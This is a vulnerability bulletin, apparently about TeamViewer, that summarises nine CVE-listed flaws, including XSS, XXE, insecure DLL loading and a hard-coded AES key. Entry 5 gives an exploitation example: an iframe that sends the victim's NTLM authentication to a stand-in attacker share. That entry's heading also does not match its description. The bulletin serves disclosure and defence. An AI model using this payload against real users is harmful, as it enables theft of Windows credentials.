Description

This security bulletin contains information about 9 secuirty vulnerabilities.

1) Improper access control (CVE-ID: CVE-2021-95907)

The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.

The vulnerability exists due to improper access restrictions in the web-remote endpoint. A remote attacker can bypass implemented security restrictions and gain unauthorized access to folders and files in the directory listing.

2) Cross-site scripting (CVE-ID: CVE-2021-42535)

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website.

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.

3) XML External Entity injection (CVE-ID: CVE-2021-42537)

The vulnerability allows a remote attacker to gain access to sensitive information.

The vulnerability exists due to insufficient validation of user-supplied XML input. A remote attacker can pass a specially crafted XML code to the affected application and view contents of arbitrary files on the system or initiate requests to external systems.

Successful exploitation of the vulnerability may allow an attacker to view contents of arbitrary file on the server or perform network scanning of internal and external infrastructure.

4) Insecure DLL loading (CVE-ID: CVE-2021-34803)

The vulnerability allows a remote attacker to compromise vulnerable system.

The vulnerability exists due to the application loads DLL libraries in an insecure manner. A remote attacker can place a specially crafted .dll file, trick the victim into opening a file, associated with the vulnerable application, and execute arbitrary code on victim's system.

5) Unquoted Search Path or Element (CVE-ID: CVE-2020-13699)

The vulnerability allows a remote attacker to gain access to sensitive information.

The vulnerability exists due to TeamViewer Desktop for Windows processes URI handlers in an insecure manner. A remote attacker can create a specially crafted link, trick the victim into clicking it and force the application to send an NTLM authentication request to a remote system.

Successful exploitation of the vulnerability may allow an attacker to obtain NTLM hash of the current Windows user, which may result in system compromise.

Exploitation example:

<iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'>

6) Use of Hard-coded Cryptographic Key (CVE-ID: CVE-2019-18988)

The vulnerability allows a local user to decrypt stored credentials.

The vulnerability exists due to application is using the same AES key for all installations to encrypt stored proxy and options password. A local user with access to he system can use the hard-coded key to decrypt credentials.

7) Improper control of interaction frequency (CVE-ID: CVE-2018-16550)

The vulnerability allows a remote attacker to perform a brute-force attack on the target system.

The vulnerability exists due to the application does not implement sufficient measures to prevent multiple failed authentication attempts. A remote attacker can bypass the brute-force authentication protection mechanism by skipping the "Cancel" step, which makes it easier to determine the correct value of the default 4-digit PIN.

8) Information disclosure (CVE-ID: CVE-2018-14333)

The vulnerability allows a remote attacker to obtain potentially sensitive information.

The vulnerability exists due to storing of a password in Unicode format within TeamViewer.exe process memory between "[00 88] and "[00 00 00]" delimiters. A remote attacker can leverage an unattended workstation on which TeamViewer has disconnected but remains running and access arbitrary data.

9) Race condition (CVE-ID: CVE-2005-2475)

The vulnerability allows a local user to escalate privileges on the system.

The vulnerability exists due to a race condition. A local user can exploit the race, modify permissions of arbitrary files and escalate privileges on the system.
